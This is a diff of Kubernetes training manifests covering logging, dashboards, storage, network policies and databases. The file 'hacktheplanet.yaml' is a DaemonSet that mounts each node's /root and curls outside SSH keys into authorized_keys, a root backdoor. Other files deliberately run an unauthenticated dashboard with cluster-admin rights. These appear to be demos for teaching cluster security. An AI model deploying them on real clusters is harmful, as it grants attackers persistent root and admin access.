          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
14 k8s/grant-admin-to-dashboard.yaml Normal file
@@ -0,0 +1,14 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
  labels:
    k8s-app: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
34 k8s/hacktheplanet.yaml Normal file
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx

18 k8s/haproxy.cfg Normal file
@@ -0,0 +1,18 @@
global
    daemon
    maxconn 256

defaults
    mode tcp
    timeout connect 5000ms
    timeout client 50000ms
    timeout server 50000ms

frontend the-frontend
    bind *:80
    default_backend the-backend

backend the-backend
    server google.com-80 google.com:80 maxconn 32 check
    server ibm.fr-80 ibm.fr:80 maxconn 32 check

16 k8s/haproxy.yaml Normal file
@@ -0,0 +1,16 @@
apiVersion: v1
kind: Pod
metadata:
  name: haproxy
spec:
  volumes:
  - name: config
    configMap:
      name: haproxy
  containers:
  - name: haproxy
    image: haproxy:1
    volumeMounts:
    - name: config
      mountPath: /usr/local/etc/haproxy/

13 k8s/ingress.yaml Normal file
@@ -0,0 +1,13 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: whatever
spec:
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 1234
360 k8s/insecure-dashboard.yaml Normal file
@@ -0,0 +1,360 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
  # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.0.0-rc2
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
            - --enable-skip-login
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
            # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "beta.kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
    spec:
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.2
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
          - mountPath: /tmp
            name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "beta.kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

---

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
        image: alpine
        name: dashboard

---

apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: insecure-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
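The `dashboard` Service above is a `NodePort` service, and the `dashboard` Deployment re-exposes the dashboard over plain HTTP through socat. A quick way to find the allocated port, sketched here assuming the nodes' addresses are reachable from your machine:

```bash
# Show the NodePort allocated to the plain-HTTP dashboard proxy;
# then browse to http://<any-node-address>:<that-port>/
kubectl get service dashboard -o jsonpath={.spec.ports[0].nodePort}
```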
k8s/just-a-pod.yaml (new file, 10 lines)
@@ -0,0 +1,10 @@
apiVersion: v1
kind: Pod
metadata:
  name: hello
  namespace: default
spec:
  containers:
  - name: hello
    image: nginx
k8s/kaniko-build.yaml (new file, 29 lines)
@@ -0,0 +1,29 @@
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
spec:
  initContainers:
  - name: git-clone
    image: alpine
    command: ["sh", "-c"]
    args:
    - |
      apk add --no-cache git &&
      git clone git://github.com/jpetazzo/container.training /workspace
    volumeMounts:
    - name: workspace
      mountPath: /workspace
  containers:
  - name: build-image
    image: gcr.io/kaniko-project/executor:latest
    args:
    - "--context=/workspace/dockercoins/rng"
    - "--insecure"
    - "--destination=registry:5000/rng-kaniko:latest"
    volumeMounts:
    - name: workspace
      mountPath: /workspace
  volumes:
  - name: workspace
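One possible way to exercise this pod, assuming the in-cluster registry Service implied by the `--destination` flag exists:

```bash
kubectl apply -f k8s/kaniko-build.yaml
# The image is built by the main container; stream its output:
kubectl logs --follow kaniko-build -c build-image
```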
k8s/kubernetes-dashboard.yaml (new file, 162 lines)
@@ -0,0 +1,162 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
k8s/local-path-storage.yaml (new file, 110 lines)
@@ -0,0 +1,110 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
        - name: config-volume
          configMap:
            name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
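For illustration, a minimal PersistentVolumeClaim using the `local-path` StorageClass above (the claim name and size are arbitrary examples). Because the class uses `WaitForFirstConsumer`, the volume will only be provisioned once a pod actually uses the claim:

```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: local-path-example   # hypothetical name, for illustration only
spec:
  accessModes:
  - ReadWriteOnce
  storageClassName: local-path
  resources:
    requests:
      storage: 128Mi
```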
k8s/metrics-server.yaml (new file, 138 lines)
@@ -0,0 +1,138 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.3
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s

---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
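Once this deployment is running, the aggregated `metrics.k8s.io` API should start serving resource metrics (possibly after a minute or so, even at the 5s resolution configured above):

```bash
kubectl top nodes
kubectl top pods --all-namespaces
```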
k8s/netpol-allow-testcurl-for-testweb.yaml (new file, 14 lines)
@@ -0,0 +1,14 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-testcurl-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress:
  - from:
    - podSelector:
        matchLabels:
          run: testcurl
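One way to check the policy, sketched under the assumption that a pod labeled `app=testweb` exists behind a Service named `testweb` (neither is shown here): a pod created with `kubectl run testcurl` carries the `run=testcurl` label that the policy matches.

```bash
kubectl run testcurl --rm -it --restart=Never --image=alpine -- wget -qO- -T 2 http://testweb
```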
k8s/netpol-deny-all-for-testweb.yaml (new file, 10 lines)
@@ -0,0 +1,10 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-all-for-testweb
spec:
  podSelector:
    matchLabels:
      app: testweb
  ingress: []
k8s/netpol-dockercoins.yaml (new file, 22 lines)
@@ -0,0 +1,22 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: deny-from-other-namespaces
spec:
  podSelector:
    matchLabels:
  ingress:
  - from:
    - podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-webui
spec:
  podSelector:
    matchLabels:
      app: webui
  ingress:
  - from: []
k8s/nginx-1-without-volume.yaml (new file, 8 lines)
@@ -0,0 +1,8 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-without-volume
spec:
  containers:
  - name: nginx
    image: nginx
k8s/nginx-2-with-volume.yaml (new file, 13 lines)
@@ -0,0 +1,13 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
k8s/nginx-3-with-git.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-git
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
k8s/nginx-4-with-init.yaml (new file, 20 lines)
@@ -0,0 +1,20 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-init
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  initContainers:
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
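The four nginx manifests above form a progression: no volume, an (implicitly empty) volume, a git sidecar filling the volume, and finally an init container doing the same job before nginx starts. A minimal check of the last variant:

```bash
kubectl apply -f k8s/nginx-4-with-init.yaml
kubectl wait --for=condition=Ready pod/nginx-with-init
# Forward a local port and fetch the page cloned by the init container:
kubectl port-forward pod/nginx-with-init 8080:80 &
curl http://localhost:8080/
```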
k8s/persistent-consul.yaml (new file, 98 lines)
@@ -0,0 +1,98 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: persistentconsul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: persistentconsul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: persistentconsul
subjects:
- kind: ServiceAccount
  name: persistentconsul
  namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
  name: persistentconsul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: persistentconsul
spec:
  serviceName: persistentconsul
  replicas: 3
  selector:
    matchLabels:
      app: persistentconsul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: persistentconsul
    spec:
      serviceAccountName: persistentconsul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - persistentconsul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.6"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
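The `-retry-join=provider=k8s ...` argument makes each Consul server discover its peers through the Kubernetes API, which is why the ClusterRole above grants `get` and `list` on pods. To check that the three servers formed a cluster:

```bash
kubectl exec persistentconsul-0 -- consul members
```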
k8s/portworx.yaml (new file, 1116 lines)
File diff suppressed because it is too large
k8s/postgres.yaml (new file, 37 lines)
@@ -0,0 +1,37 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: postgres
spec:
  selector:
    matchLabels:
      app: postgres
  serviceName: postgres
  template:
    metadata:
      labels:
        app: postgres
    spec:
      #schedulerName: stork
      initContainers:
      - name: rmdir
        image: alpine
        volumeMounts:
        - mountPath: /vol
          name: postgres
        command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
      containers:
      - name: postgres
        image: postgres:11
        volumeMounts:
        - mountPath: /var/lib/postgresql/data
          name: postgres
  volumeClaimTemplates:
  - metadata:
      name: postgres
    spec:
      accessModes: ["ReadWriteOnce"]
      resources:
        requests:
          storage: 1Gi
k8s/psp-privileged.yaml (new file, 39 lines)
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
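The ClusterRole above only grants the `use` verb on the policy; it has no effect until it is bound. A hypothetical binding (the name and subject below are illustrative only) might look like:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: psp-privileged-example   # hypothetical name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp:privileged
subjects:
- kind: ServiceAccount
  name: default                  # illustrative subject
  namespace: kube-system
```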
k8s/psp-restricted.yaml (new file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
